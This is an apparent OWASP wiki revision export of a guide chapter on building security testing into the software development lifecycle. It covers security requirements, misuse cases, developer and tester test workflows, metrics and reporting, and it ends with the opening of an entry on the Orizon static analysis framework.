By considering the threat scenarios exploiting common vulnerabilities it is possible to identify potential risks for which the application security control needs to be security tested. For example, the OWASP Top Ten vulnerabilities can be mapped to attacks such as phishing, privacy violations, identify theft, system compromise, data alteration or data destruction, financial loss, and reputation loss. Such issues should be documented as part of the threat scenarios. By thinking in terms of threats and vulnerabilities, it is possible to devise a battery of tests that simulate such attack scenarios. Ideally, the organization vulnerability knowledge base can be used to derive security risk driven tests cases to validate the most likely attack scenarios. For example if identity theft is considered high risk, negative test scenarios should validate the mitigation of impacts deriving from the exploit of vulnerabilities in authentication, cryptographic controls, input validation, and authorization controls.&lt;br /&gt;
&lt;br /&gt;
===Functional and Non Functional Test Requirements===&lt;br /&gt;
'''Functional Security Requirements'''&amp;lt;br&amp;gt;&lt;br /&gt;
From the perspective of functional security requirements, the applicable standards, policies and regulations drive both the need of a type of security control as well as the control functionality. These requirements are also referred to as “positive requirements”, since they state the expected functionality that can be validated through security tests.&lt;br /&gt;
Examples of positive requirements are: “the application will lockout the user after six failed logon attempts” or “passwords need to be six min characters, alphanumeric”. The validation of positive requirements consists of asserting the expected functionality and, as such, can be tested by re-creating the testing conditions, and by running the test according to predefined inputs and by asserting the expected outcome as a fail/pass condition.&lt;br /&gt;
&lt;br /&gt;
In order to validate security requirements with security tests, security requirements need to be function driven and highlight the expected functionality (the what) and implicitly the implementation (the how). Examples of high-level security design requirements for authentication can be:&lt;br /&gt;
*Protect user credentials and shared secrets in transit and in storage&lt;br /&gt;
*Mask any confidential data in display (e.g., passwords, accounts)&lt;br /&gt;
*Lock the user account after a certain number of failed login attempts &lt;br /&gt;
*Do not show specific validation errors to the user as a result of failed logon &lt;br /&gt;
*Only allow passwords that are alphanumeric, include special characters and six characters minimum length, to limit the attack surface&lt;br /&gt;
*Allow for password change functionality only to authenticated users by validating the old password, the new password, and the user answer to the challenge question, to prevent brute forcing of a password via password change.&lt;br /&gt;
*The password reset form should validate the user’s username and the user’s registered email before sending the temporary password to the user via email. The temporary password issued should be a one time password. A link to the password reset web page will be sent to the user. The password reset web page should validate the user temporary password, the new password, as well as the user answer to the challenge question.&lt;br /&gt;
&lt;br /&gt;
'''Risk Driven Security Requirements'''&amp;lt;br&amp;gt;&lt;br /&gt;
Security tests need also to be risk driven, that is they need to validate the application for unexpected behavior. These are also called “negative requirements”, since they specify what the application should not do. &lt;br /&gt;
Examples of &amp;quot;should not do&amp;quot; (negative) requirements are:&lt;br /&gt;
* The application should not allow for the data to be altered or destroyed&lt;br /&gt;
* The application should not be compromised or misused for unauthorized financial transactions by a malicious user.&lt;br /&gt;
&lt;br /&gt;
Negative requirements are more difficult to test, because there is no expected behavior to look for. This might require a threat analyst to come up with unforeseeable input conditions, causes, and effects. This is where security testing needs to be driven by risk analysis and threat modeling.&lt;br /&gt;
The key is to document the threat scenarios and the functionality of the countermeasure as a factor to mitigate a threat. For example, in the case of authentication controls, the following security requirements can be documented from the threats and countermeasure perspective:&lt;br /&gt;
*Encrypt authentication data in storage and transit to mitigate risk of information disclosure and authentication protocol attacks&lt;br /&gt;
*Encrypt passwords using non reversible encryption such as using a digest (e.g., HASH) and a seed to prevent dictionary attacks&lt;br /&gt;
*Lock out accounts after reaching a logon failure threshold and enforce password complexity to mitigate risk of brute force password attacks&lt;br /&gt;
*Display generic error messages upon validation of credentials to mitigate risk of account harvesting/enumeration&lt;br /&gt;
*Mutually authenticate client and server to prevent non-repudiation and Man In the Middle (MiTM) attacks&lt;br /&gt;
&lt;br /&gt;
Threat modeling artifacts such as threat trees and attack libraries can be useful to derive the negative test scenarios. A threat tree will assume a root attack (e.g., attacker might be able to read other users' messages) and identify different exploits of security controls (e.g., data validation fails because of a SQL injection vulnerability) and necessary countermeasures (e.g., implement data validation and parametrized queries) that could be validated to be effective in mitigating such attacks.&lt;br /&gt;
&lt;br /&gt;
===Security Requirements Derivation Through Use and Misuse Cases===&lt;br /&gt;
Pre-requisite in describing the application functionality is to understand what the application is supposed to do and how. This can be done by describing ''use cases''. Use cases, in the graphical form as commonly used in software engineering, show the interactions of actors and their relations, and help to identify the actors in the application, their relationships, the intended sequence of actions for each scenario, alternative actions, special requirements, and pre- and post-conditions. Similar to use cases, ''misuse and abuse cases'' [19] describe unintended and malicious use scenarios of the application. These misuse cases provide a way to describe scenarios of how an attacker could misuse and abuse the application. By going through the individual steps in a use scenario and thinking about how it can be maliciously exploited, potential flaws or aspects of the application that are not well-defined can be discovered. The key is to describe all possible or, at least, the most critical use and misuse scenarios. Misuse scenarios allow the analysis of the application from the attacker's point of view and contribute to identifying potential vulnerabilities and the countermeasures that need to be implemented to mitigate the impact caused by the potential exposure to such vulnerabilities. Given all of the use and abuse cases, it is important to analyze them to determine which of them are the most critical ones and need to be documented in security requirements. The identification of the most critical misuse and abuse cases drives the documentation of security requirements and the necessary controls where security risks should be mitigated.&lt;br /&gt;
&lt;br /&gt;
To derive security requirements from use and misuse case [20] , it is important to define the functional scenarios and the negative scenarios, and put these in graphical form. In the case of derivation of security requirements for authentication, for example, the following step-by-step methodology can be followed.&lt;br /&gt;
&lt;br /&gt;
*Step 1: Describe the Functional Scenario: User authenticates by supplying username and password. The application grants access to users based upon authentication of user credentials by the application and provides specific errors to the user when validation fails.&lt;br /&gt;
&lt;br /&gt;
*Step 2: Describe the Negative Scenario:  Attacker breaks the authentication through a brute force/dictionary attack of passwords and account harvesting vulnerabilities in the application. The validation errors provide specific information to an attacker to guess which accounts are actually valid, registered accounts (usernames). The attacker, then, will try to brute force the password for such a valid account. A brute force attack to four minimum length all digit passwords can succeed with a limited number of attempts (i.e., 10^4).&lt;br /&gt;
&lt;br /&gt;
*Step 3: Describe Functional and Negative Scenarios With Use and Misuse Case: The graphical example in Figure below depicts the derivation of security requirements via use and misuse cases. The functional scenario consists of the user actions (entering username and password) and the application actions (authenticating the user and providing an error message if validation fails). The misuse case consists of the attacker actions, i.e., trying to break authentication by brute forcing the password via a dictionary attack and by guessing the valid usernames from error messages. By graphically representing the threats to the user actions (misuses), it is possible to derive the countermeasures as the application actions that mitigate such threats.&lt;br /&gt;
[[Image:UseAndMisuseCase.jpg]]&lt;br /&gt;
&lt;br /&gt;
*Step 4: Elicit The Security Requirements. In this case, the following security requirements for authentication are derived: &lt;br /&gt;
:1) Passwords need to be alphanumeric, lower and upper case and minimum of seven character length&lt;br /&gt;
:2) Accounts need to lockout after five unsuccessful login attempt&lt;br /&gt;
:3) Logon error messages need to be generic&lt;br /&gt;
These security requirements need to be documented and tested.&lt;br /&gt;
&lt;br /&gt;
===Security Tests Integrated in Developers' and Testers' Workflows===&lt;br /&gt;
'''Developers' Security Testing Workflow'''&amp;lt;br&amp;gt;&lt;br /&gt;
Security testing during the development phase of the SDLC represents the first opportunity for developers to ensure that individual software components that they have developed are security tested before they are integrated with other components and built into the application. Software components might consist of software artifacts such as functions, methods, and classes, as well as application programming interfaces, libraries, and executables. For security testing, developers can rely on the results of the source code analysis to verify statically that the developed source code does not include potential vulnerabilities and is compliant with the secure coding standards. Security unit tests can further verify dynamically (i.e., at run time) that the components function as expected.  Before integrating both new and existing code changes in the application build, the results of the static and dynamic analysis should be reviewed and validated. &lt;br /&gt;
The validation of source code before integration in application builds is usually the responsibility of the senior developer. Such senior developer is also the subject matter expert in software security and his role is to lead the secure code review and make decisions whether to accept the code to be released in the application build or to require further changes and testing. This secure code review workflow can be enforced via formal acceptance as well as a check in a workflow management tool. For example, assuming the typical defect management workflow used for functional bugs, security bugs that have been fixed by a developer can be reported on a defect or change management system. The build master can look at the test results reported by the developers in the tool and grant approvals for checking in the code changes into the application build.&lt;br /&gt;
&lt;br /&gt;
'''Testers' Security Testing Workflow'''&amp;lt;br&amp;gt;&lt;br /&gt;
After components and code changes are tested by developers and checked in to the application build, the most likely next step in the software development process workflow is to perform tests on the application as a whole entity. This level of testing is usually referred to as integrated test and system level test. When security tests are part of these testing activities, they can be used to validate both the security functionality of the application as a whole, as well as the exposure to application level vulnerabilities. These security tests on the application include both white box testing, such as source code analysis, and black box testing, such as penetration testing. Gray box testing is similar to Black box testing. In a gray box testing we can assume we have some partial knowledge about the session management of our application, and that should help us in understanding whether the logout and timeout functions are properly secured.&lt;br /&gt;
&lt;br /&gt;
The target for the security tests is the complete system that is the artifact that will be potentially attacked and includes both whole source code and the executable. One peculiarity of security testing during this phase is that it is possible for security testers to determine whether vulnerabilities can be exploited and expose the application to real risks. &lt;br /&gt;
These include common web application vulnerabilities, as well as security issues that have been identified earlier in the SDLC with other activities such as threat modeling, source code analysis, and secure code reviews. &lt;br /&gt;
&lt;br /&gt;
Usually, testing engineers, rather then software developers, perform security tests when the application is in scope for integration system tests. Such testing engineers have security knowledge of web application vulnerabilities, black box and white box security testing techniques, and own the validation of security requirements in this phase. In order to perform such security tests, it is a pre-requisite that security test cases are documented in the security testing guidelines and procedures.&lt;br /&gt;
&lt;br /&gt;
A testing engineer who validates the security of the application in the integrated system environment might release the application for testing in the operational environment (e.g., user acceptance tests). At this stage of the SDLC (i.e., validation), the application functional testing is usually a responsibility of QA testers, while white-hat hackers/security consultants are usually responsible for security testing. Some organizations rely on their own specialized ethical hacking team in order to conduct such tests when a third party assessment is not required (such as for auditing purposes). &lt;br /&gt;
&lt;br /&gt;
Since these tests are the last resort for fixing vulnerabilities before the application is released to production, it is important that such issues are addressed as recommended by the testing team (e.g., the recommendations can include code, design, or configuration change). At this level, security auditors and information security officers discuss the reported security issues and analyze the potential risks according to information risk management procedures. Such procedures might require the developer team to fix all high risk vulnerabilities before the application could be deployed, unless such risks are acknowledged and accepted.&lt;br /&gt;
&lt;br /&gt;
===Developers' Security Tests===&lt;br /&gt;
'''Security Testing in the Coding Phase: Unit Tests'''&amp;lt;br&amp;gt;&lt;br /&gt;
From the developer’s perspective, the main objective of security tests is to validate that code is being developed in compliance with secure coding standards requirements. Developers' own coding artifacts such as functions, methods, classes, APIs, and libraries need to be functionally validated before being integrated into the application build. &lt;br /&gt;
&lt;br /&gt;
The security requirements that developers have to follow should be documented in secure coding standards and validated with static and dynamic analysis. As testing activity following a secure code review, unit tests can validate that code changes required by secure code reviews are properly implemented. Secure code reviews and source code analysis through source code analysis tools help developers in identifying security issues in source code as it is developed. By using unit tests and dynamic analysis (e.g., debugging) developers can validate the security functionality of components as well as verify that the countermeasures being developed mitigate any security risks previously identified through threat modeling and source code analysis.  &lt;br /&gt;
&lt;br /&gt;
A good practice for developers is to build security test cases as a generic security test suite that is part of the existing unit testing framework. A generic security test suite could be derived from previously defined use and misuse cases to security test functions, methods and classes. A generic security test suite might include security test cases to validate both positive and negative requirements for security controls such as:&lt;br /&gt;
* Authentication &amp;amp; Access Control&lt;br /&gt;
* Input Validation &amp;amp; Encoding&lt;br /&gt;
* Encryption&lt;br /&gt;
* User and Session Management&lt;br /&gt;
* Error and Exception Handling&lt;br /&gt;
* Auditing and Logging&lt;br /&gt;
&lt;br /&gt;
Developers empowered with a source code analysis tool integrated into their IDE, secure coding standards, and a security unit testing framework can assess and verify the security of the software components being developed. Security test cases can be run to identify potential security issues that have root causes in source code: besides input and output validation of parameters entering and exiting the components, these issues include authentication and authorization checks done by the component, protection of the data within the component, secure exception and error handling, and secure auditing and logging. Unit test frameworks such as Junit, Nunit, and CUnit can be adapted to verify security test requirements. In the case of security functional tests, unit level tests can test the functionality of security controls at the software component level, such as functions, methods, or classes. For example, a test case could validate input and output validation (e.g., variable sanitization) and boundary checks for variables by asserting the expected functionality of the component.&lt;br /&gt;
&lt;br /&gt;
The threat scenarios identified with use and misuse cases can be used to document the procedures for testing software components. In the case of authentication components, for example, security unit tests can assert the functionality of setting an account lockout as well as the fact that user input parameters cannot be abused to bypass the account lockout (e.g., by setting the account lockout counter to a negative number). At the component level, security unit tests can validate positive assertions as well as negative assertions, such as errors and exception handling. Exceptions should be caught without leaving the system in an insecure state, such as potential denial of service caused by resources not being deallocated (e.g., connection handles not closed within a final statement block), as well as potential elevation of privileges (e.g., higher privileges acquired before the exception is thrown and not re-set to the previous level before exiting the function). Secure error handling can validate potential information disclosure via informative error messages and stack traces. &lt;br /&gt;
&lt;br /&gt;
Unit level security test cases can be developed by a security engineer who is the subject matter expert in software security and is also responsible for validating that the security issues in the source code have been fixed and can be checked into the integrated system build.  Typically, the manager of the application builds also makes sure that third-party libraries and executable files are security assessed for potential vulnerabilities before being integrated in the application build.&lt;br /&gt;
&lt;br /&gt;
Threat scenarios for common vulnerabilities that have root causes in insecure coding can also be documented in the developer’s security testing guide. When a fix is implemented for a coding defect identified with source code analysis, for example, security test cases can verify that the implementation of the code change follows the secure coding requirements documented in the secure coding standards. &lt;br /&gt;
&lt;br /&gt;
Source code analysis and unit tests can validate that the code change mitigates the vulnerability exposed by the previously identified coding defect. The results of automated secure code analysis can also be used as automatic check-in gates for version control: software artifacts cannot be checked into the build with high or medium severity coding issues.&lt;br /&gt;
&lt;br /&gt;
===Functional Testers' Security Tests===&lt;br /&gt;
'''Security Testing During the Integration and Validation Phase: Integrated System Tests and Operation Tests'''&amp;lt;br&amp;gt;&lt;br /&gt;
The main objective of integrated system tests is to validate the “defense in depth” concept, that is, that the implementation of security controls provides security at different layers. For example, the lack of input validation when calling a component integrated with the application is often a factor that can be tested with integration testing. &lt;br /&gt;
&lt;br /&gt;
The integration system test environment is also the first environment where testers can simulate real attack scenarios as can be potentially executed by a malicious external or internal user of the application. Security testing at this level can validate whether vulnerabilities are real and can be exploited by attackers. For example, a potential vulnerability found in source code can be rated as high risk because of the exposure to potential malicious users, as well as because of the potential impact (e.g., access to confidential information).&lt;br /&gt;
Real attack scenarios can be tested with both manual testing techniques and penetration testing tools. Security tests of this type are also referred to as ethical hacking tests. From the security testing perspective, these are risk driven tests and have the objective to test the application in the operational environment. The target is the application build that is representative of the version of the application being deployed into production.&lt;br /&gt;
&lt;br /&gt;
The execution of security in the integration and validation phase is critical to identifying vulnerabilities due to integration of components as well as validating the exposure of such vulnerabilities. Since application security testing requires a specialized set of skills, which includes both software and security knowledge and is not typical of security engineers, organizations are often required to security-train their software developers on ethical hacking techniques, security assessment procedures and tools. A realistic scenario is to develop such resources in-house and document them in security testing guides and procedures that take into account the developer’s security testing knowledge. A so called “security test cases cheat list or check-list”, for example, can provide simple test cases and attack vectors that can be used by testers to validate exposure to common vulnerabilities such as spoofing, information disclosures, buffer overflows, format strings, SQL injection and XSS injection, XML, SOAP, canonicalization issues, denial of service and managed code and ActiveX controls (e.g., .NET). A first battery of these tests can be performed manually with a very basic knowledge of software security. The first objective of security tests might be the validation of a set of minimum security requirements. These security test cases might consist of manually forcing the application into error and exceptional states, and gathering knowledge from the application behavior. For example, SQL injection vulnerabilities can be tested manually by injecting attack vectors through user input and by checking if SQL exceptions are thrown back the user. The evidence of a SQL exception error might be a manifestation of a vulnerability that can be exploited. A more in-depth security test might require the tester’s knowledge of specialized testing techniques and tools. Besides source code analysis and penetration testing, these techniques include, for example, source code and binary fault injection, fault propagation analysis and code coverage, fuzz testing, and reverse engineering. The security testing guide should provide procedures and recommend tools that can be used by security testers to perform such in-depth security assessments.&lt;br /&gt;
&lt;br /&gt;
The next level of security testing after integration system tests is to perform security tests in the user acceptance environment. There are unique advantages to performing security tests in the operational environment. The user acceptance tests environment (UAT) is the one that is most representative of the release configuration, with the exception of the data (e.g., test data is used in place of real data). A characteristic of security testing in UAT is testing for security configuration issues. In some cases these vulnerabilities might represent high risks. For example, the server that hosts the web application might not be configured with minimum privileges, valid SSL certificate and secure configuration, essential services disabled and web root directory not cleaned from test and administration web pages.&lt;br /&gt;
&lt;br /&gt;
===Security Test Data Analysis and Reporting===&lt;br /&gt;
'''Goals for Security Test Metrics and Measurements'''&amp;lt;br&amp;gt;&lt;br /&gt;
The definition of the goals for the security testing metrics and measurements is a pre-requisite for using security testing data for risk analysis and management processes. For example, a measurement such as the total number of vulnerabilities found with security tests might quantify the security posture of the application. These measurements also help to identify security objectives for software security testing: for example, reducing the number of vulnerabilities to an acceptable number (minimum) before the application is deployed into production. &lt;br /&gt;
&lt;br /&gt;
Another manageable goal could be to compare the application security posture against a baseline to assess improvements in application security processes. For example, the security metrics baseline might consist of an application that was tested only with penetration tests. The security data obtained from an application that was also security tested during coding should show an improvement (e.g., fewer number of vulnerabilities) when compared with the baseline.&lt;br /&gt;
&lt;br /&gt;
In traditional software testing, the number of software defects, such as the bugs found in an application, could provide a measure of software quality. Similarly, security testing can provide a measure of software security. From the defect management and reporting perspective, software quality and security testing can use similar categorizations for root causes and defect remediation efforts. From the root cause perspective, a security defect can be due to an error in design (e.g., security flaws) or due to an error in coding (e.g., security bug). From the perspective of the effort required to fix a defect, both security and quality defects can be measured in terms of developer hours to implement the fix, the tools and resources required to fix, and, finally, the cost to implement the fix.&lt;br /&gt;
&lt;br /&gt;
A characteristic of security test data, compared to quality data, is the categorization in terms of the threat, the exposure of the vulnerability, and the potential impact posed by the vulnerability to determine the risk. Testing applications for security consists of managing technical risks to make sure that the application countermeasures meet acceptable levels. For this reason, security testing data needs to support the security risk strategy at critical checkpoints during the SDLC. For example, vulnerabilities found in source code with source code analysis represent an initial measure of risk. Such measure of risk (e.g., high, medium, low) for the vulnerability can be calculated by determining the exposure and likelihood factors and, further, by validating such vulnerability with penetration tests. The risk metrics associated to vulnerabilities found with security tests empower business management to make risk management decisions, such as to decide whether risks can be accepted, mitigated, or transferred at different levels within the organization (e.g., business as well as technical).&lt;br /&gt;
&lt;br /&gt;
When evaluating the security posture of an applications, it is important to take into consideration certain factors, such as the size of the application being developed. Application size has been statistically proven to be related to the number of issues found in the application with tests. One measure of application size is the number of line of code (LOC) of the application. Typically,  software quality defects range from about 7 to 10 defects per thousand lines of new and changed code [21]. Since testing can reduce the overall number by about 25% with one test alone, it is logical for larger size applications to be tested more and more often than smaller size applications.&lt;br /&gt;
&lt;br /&gt;
When security testing is done in several phases of the SDLC, the test data could prove the capability of the security tests in detecting vulnerabilities as soon as they are introduced, and prove the effectiveness of removing them by implementing countermeasures at different checkpoints of the SDLC. A measurement of this type is also defined as “containment metrics” and provides a measure of the ability of a security assessment performed at each phase of the development process to maintain security within each phase. These containment metrics are also a critical factor in lowering the cost of fixing the vulnerabilities, since it is less expensive to deal with the vulnerabilities when they are found (in the same phase of the SDLC), rather then fixing them later in another phase. &lt;br /&gt;
&lt;br /&gt;
Security test metrics can support security risk, cost, and defect management analysis when it is associated with tangible and timed goals such as: &lt;br /&gt;
*Reducing the overall number of vulnerabilities by 30%&lt;br /&gt;
*Security issues are expected to be fixed by a certain deadline (e.g., before beta release) &lt;br /&gt;
&lt;br /&gt;
Security test data can be absolute, such as the number of vulnerabilities detected during manual code review, as well as comparative, such as the number of vulnerabilities detected in code reviews vs. penetration tests. To answer questions about the quality of the security process, it is important to determine a baseline for what could be considered acceptable and good. &lt;br /&gt;
&lt;br /&gt;
Security test data can also support specific objectives of the security analysis such as compliance with security regulations and information security standards, management of security processes, the identification of security root causes and process improvements, and security costs vs. benefits analysis.&lt;br /&gt;
&lt;br /&gt;
When security test data is reported it has to provide metrics to support the analysis. The scope of the analysis is the interpretation of test data to find clues about the security of the software being produced as well the effectiveness of the process. &lt;br /&gt;
Some examples of clues supported by security test data can be:&lt;br /&gt;
*Are vulnerabilities reduced to an acceptable level for release?&lt;br /&gt;
*How does the security quality of this product compare with similar software products?&lt;br /&gt;
*Are all security test requirements being met? &lt;br /&gt;
*What are the major root causes of security issues?&lt;br /&gt;
*How numerous are security flaws compared to security bugs?&lt;br /&gt;
*Which security activity is most effective in finding vulnerabilities?&lt;br /&gt;
*Which team is more productive in fixing security defects and vulnerabilities?&lt;br /&gt;
*Which percentage of overall vulnerabilities are high risk?&lt;br /&gt;
*Which tools are most effective in detecting security vulnerabilities?&lt;br /&gt;
*Which kind of security tests are most effective in finding vulnerabilities (e.g., white box vs. black box) tests?&lt;br /&gt;
*How many security issues are found during secure code reviews?&lt;br /&gt;
*How many security issues are found during secure design reviews?&lt;br /&gt;
&lt;br /&gt;
In order to make a sound judgment using the testing data, it is important to have a good understanding of the testing process as well as the testing tools. A tool taxonomy should be adopted to decide which security tools should be used. Security tools can be qualified as being good at finding common known vulnerabilities targeting different artifacts.&lt;br /&gt;
The issue is that the unknown security issues are not tested: the fact that you come out clean it does not mean that your software or application is good. Some studies [22] have demonstrated that, at best, tools can find 45% of overall vulnerabilities. &lt;br /&gt;
&lt;br /&gt;
Even the most sophisticated automation tools are not a match for an experienced security tester: just relying on successful test results from automation tools will give security practitioners a false sense of security.  Typically, the more experienced the security testers are with the security testing methodology and testing tools, the better the results of the security test and analysis will be. It is important that managers making an investment in security testing tools also consider an investment in hiring skilled human resources as well as security test training.&lt;br /&gt;
&lt;br /&gt;
'''Reporting Requirements'''&amp;lt;br&amp;gt;&lt;br /&gt;
The security posture of an application can be characterized from the perspective of the effect, such as number of vulnerabilities and the risk rating of the vulnerabilities, as well as from the perspective of the cause (i.e., origin) such as coding errors, architectural flaws, and configuration issues.  &lt;br /&gt;
&lt;br /&gt;
Vulnerabilities can be classified according to different criteria. This can be a statistical categorization, such as the OWASP Top 10 and WASC (Web Application Security Statistics) project, or related to defensive controls as in the case of WASF (Web Application Security Framework) categorization.&lt;br /&gt;
&lt;br /&gt;
When reporting security test data, the best practice is to include the following information, besides the categorization of each vulnerability by type:&lt;br /&gt;
*The security threat that the issue is exposed to&lt;br /&gt;
*The root cause of security issues (e.g., security bugs, security flaw)&lt;br /&gt;
*The testing technique used to find it&lt;br /&gt;
*The remediation of the vulnerability (e.g., the countermeasure) &lt;br /&gt;
*The risk rating of the vulnerability (High, Medium, Low)&lt;br /&gt;
&lt;br /&gt;
By describing what the security threat is, it will be possible to understand if and why the mitigation control is ineffective in mitigating the threat. &lt;br /&gt;
&lt;br /&gt;
Reporting the root cause of the issue can help pinpoint what needs to be fixed: in the case of a white box testing, for example, the software security root cause of the vulnerability will be the offending source code. &lt;br /&gt;
&lt;br /&gt;
Once issues are reported, it is also important to provide guidance to the software developer on how to re-test and find the vulnerability. This might involve using a white box testing technique (e.g., security code review with a static code analyzer) to find if the code is vulnerable. If a vulnerability can be found via a black box technique (penetration test), the test report also needs to provide information on how to validate the exposure of the vulnerability to the front end (e.g., client).&lt;br /&gt;
&lt;br /&gt;
The information about how to fix the vulnerability should be detailed enough for a developer to implement a fix. It should provide secure coding examples, configuration changes, and provide adequate references.&lt;br /&gt;
&lt;br /&gt;
Finally the risk rating helps to prioritize the remediation effort. Typically, assigning a risk rating to the vulnerability involves a risk analysis based upon factors such as impact and exposure.&lt;br /&gt;
&lt;br /&gt;
'''Business Cases'''&amp;lt;br&amp;gt; &lt;br /&gt;
For the security test metrics to be useful, they need to provide value back to the organization's security test data stakeholders, such as project managers, developers, information security offices, auditors, and chief information officers. The value can be in terms of the business case that each project stakeholder has in terms of role and responsibility.&lt;br /&gt;
&lt;br /&gt;
Software developers look at security test data to show that software is coded more securely and efficiently, so that they can make the case of using source code analysis tools as well as following secure coding standards and attending software security training. &lt;br /&gt;
&lt;br /&gt;
Project managers look for data that allows them to successfully manage and utilize security testing activities and resources according to the project plan. To project managers, security test data can show that projects are on schedule and moving on target for delivery dates and are getting better during tests. &lt;br /&gt;
&lt;br /&gt;
Security test data also helps the business case for security testing if the initiative comes from information security officers (ISOs). For example, it can provide evidence that security testing during the SDLC does not impact the project delivery, but rather reduces the overall workload needed to address vulnerabilities later in production. &lt;br /&gt;
&lt;br /&gt;
To compliance auditors, security test metrics provide a level of software security assurance and confidence that security standard compliance is addressed through the security review processes within the organization. &lt;br /&gt;
&lt;br /&gt;
Finally, Chief Information Officers (CIOs) and Chief Information Security Officers (CISOs), responsible for the budget that needs to be allocated in security resources, look for derivation of a cost/benefit analysis from security test data to make informed decisions on which security activities and tools to invest. One of the metrics that support such analysis is the Return On Investment (ROI) in Security [23]. To derive such metrics from security test data, it is important to quantify the differential between the risk due to the exposure of vulnerabilities and the effectiveness of the security tests in mitigating the security risk, and factor this gap with the cost of the security testing activity or the testing tools adopted.&lt;br /&gt;
&lt;br /&gt;
== References ==&lt;br /&gt;
[1] T. DeMarco, ''Controlling Software Projects: Management, Measurement and Estimation'', Yourdon Press, 1982&lt;br /&gt;
&lt;br /&gt;
[2] S. Payne, ''A Guide to Security Metrics'' - http://www.sans.org/reading_room/whitepapers/auditing/55.php&lt;br /&gt;
&lt;br /&gt;
[3] NIST, ''The economic impacts of inadequate infrastructure for software testing'' - http://www.nist.gov/public_affairs/releases/n02-10.htm&lt;br /&gt;
&lt;br /&gt;
[4] Ross Anderson, ''Economics and Security Resource Page'' - http://www.cl.cam.ac.uk/users/rja14/econsec.html &lt;br /&gt;
&lt;br /&gt;
[5] Denis Verdon, ''Teaching Developers To Fish'' - [[OWASP AppSec NYC 2004]]&lt;br /&gt;
&lt;br /&gt;
[6] Bruce Schneier, ''Cryptogram Issue #9'' - http://www.schneier.com/crypto-gram-0009.html&lt;br /&gt;
&lt;br /&gt;
[7] Symantec, ''Threat Reports'' -  http://www.symantec.com/business/theme.jsp?themeid=threatreport&lt;br /&gt;
&lt;br /&gt;
[8] FTC, ''The Gramm-Leach Bliley Act'' - http://www.ftc.gov/privacy/privacyinitiatives/glbact.html&lt;br /&gt;
&lt;br /&gt;
[9] Senator Peace and Assembly Member Simitian, ''SB 1386''- http://www.leginfo.ca.gov/pub/01-02/bill/sen/sb_1351-1400/sb_1386_bill_20020926_chaptered.html&lt;br /&gt;
&lt;br /&gt;
[10] European Union, ''Directive 96/46/EC on the protection of individuals with regard to the processing of personal data and on the free movement of such data'' -&lt;br /&gt;
http://ec.europa.eu/justice_home/fsj/privacy/docs/95-46-ce/dir1995-46_part1_en.pdf&lt;br /&gt;
&lt;br /&gt;
[11] NIST, '' Risk management guide for information technology systems'' - http://csrc.nist.gov/publications/nistpubs/800-30/sp800-30.pdf&lt;br /&gt;
&lt;br /&gt;
[12] SEI, Carnegie Mellon, ''Operationally Critical Threat, Asset, and Vulnerability Evaluation (OCTAVE)'' - http://www.cert.org/octave/&lt;br /&gt;
&lt;br /&gt;
[13] Ken Thompson, ''Reflections on Trusting Trust, Reprinted from Communication of the ACM '' - http://cm.bell-labs.com/who/ken/trust.html''&lt;br /&gt;
&lt;br /&gt;
[14] Gary McGraw, ''Beyond the Badness-ometer'' - http://www.ddj.com/security/189500001&lt;br /&gt;
&lt;br /&gt;
[15] FFIEC, '' Authentication in an Internet Banking Environment'' - http://www.ffiec.gov/pdf/authentication_guidance.pdf&lt;br /&gt;
&lt;br /&gt;
[16] PCI Security Standards Council, ''PCI Data Security Standard'' -https://www.pcisecuritystandards.org/security_standards/pci_dss.shtml &lt;br /&gt;
&lt;br /&gt;
[17] MSDN, ''Cheat Sheet: Web Application Security Frame'' - http://msdn.microsoft.com/en-us/library/ms978518.aspx#tmwacheatsheet_webappsecurityframe &lt;br /&gt;
&lt;br /&gt;
[18] MSDN, ''Improving Web Application Security, Chapter 2, Threat And Countermeasures'' - http://msdn.microsoft.com/en-us/library/aa302418.aspx&lt;br /&gt;
&lt;br /&gt;
[19] Gil Regev, Ian Alexander,Alain Wegmann, ''Use Cases and Misuse Cases Model the Regulatory Roles of Business Processes'' - http://easyweb.easynet.co.uk/~iany/consultancy/regulatory_processes/regulatory_processes.htm&lt;br /&gt;
&lt;br /&gt;
[20] Sindre,G. Opdmal A., '' Capturing Security Requirements Through Misuse Cases ' - http://folk.uio.no/nik/2001/21-sindre.pdf&lt;br /&gt;
&lt;br /&gt;
[21] Security Across the Software Development Lifecycle Task Force, ''Referred Data from Caper Johns, Software Assessments, Benchmarks and Best Practices'' -http://www.cyberpartnership.org/SDLCFULL.pdf&lt;br /&gt;
&lt;br /&gt;
[22] MITRE, ''Being Explicit About Weaknesses, Slide 30, Coverage of CWE'' -http://cwe.mitre.org/documents/being-explicit/BlackHatDC_BeingExplicit_Slides.ppt&lt;br /&gt;
&lt;br /&gt;
[23] Marco Morana, ''Building Security Into The Software Life Cycle, A Business Case'' - http://www.blackhat.com/presentations/bh-usa-06/bh-us-06-Morana-R3.0.pdf&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;/div&gt;</summary>
		<author><name>KirstenS</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=The_Owasp_Orizon_Framework&amp;diff=61247</id>
		<title>The Owasp Orizon Framework</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=The_Owasp_Orizon_Framework&amp;diff=61247"/>
				<updated>2009-05-22T13:07:43Z</updated>
		
		<summary type="html">&lt;p&gt;KirstenS: /* Reference */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[OWASP Code Review Guide Table of Contents]]__TOC__&lt;br /&gt;
[[Category:OWASP Code Review Project]]&lt;br /&gt;
&lt;br /&gt;
== Introduction ==&lt;br /&gt;
A lot of open source projects exist in the wild, performing static code review analysis. This is good, it means that source code testing for security issues is becoming a constraint. &lt;br /&gt;
&lt;br /&gt;
Such tools bring a lot of valuable points:&lt;br /&gt;
* community support&lt;br /&gt;
* source code freely available to anyone&lt;br /&gt;
* costs&lt;br /&gt;
&lt;br /&gt;
On the other side, these tools don't share the most valuable point among them: the security knowledge. All these tools have their own security library, containing a lot of checks, without sharing such knowledge. &lt;br /&gt;
&lt;br /&gt;
In 2006, the Owasp Orizon project wass born to provide a common underlying layer to all opensource projects concerning static analysis. &lt;br /&gt;
&lt;br /&gt;
Orizon project includes:&lt;br /&gt;
* a set of APIs that developers can use to build their own security tool performing static analysis.&lt;br /&gt;
* a security library with checks to apply to source code.&lt;br /&gt;
* a tool, Milk, which is able to static analyze a source code using Orizon Framework.&lt;br /&gt;
&lt;br /&gt;
== The Owasp Orizon Architecture ==&lt;br /&gt;
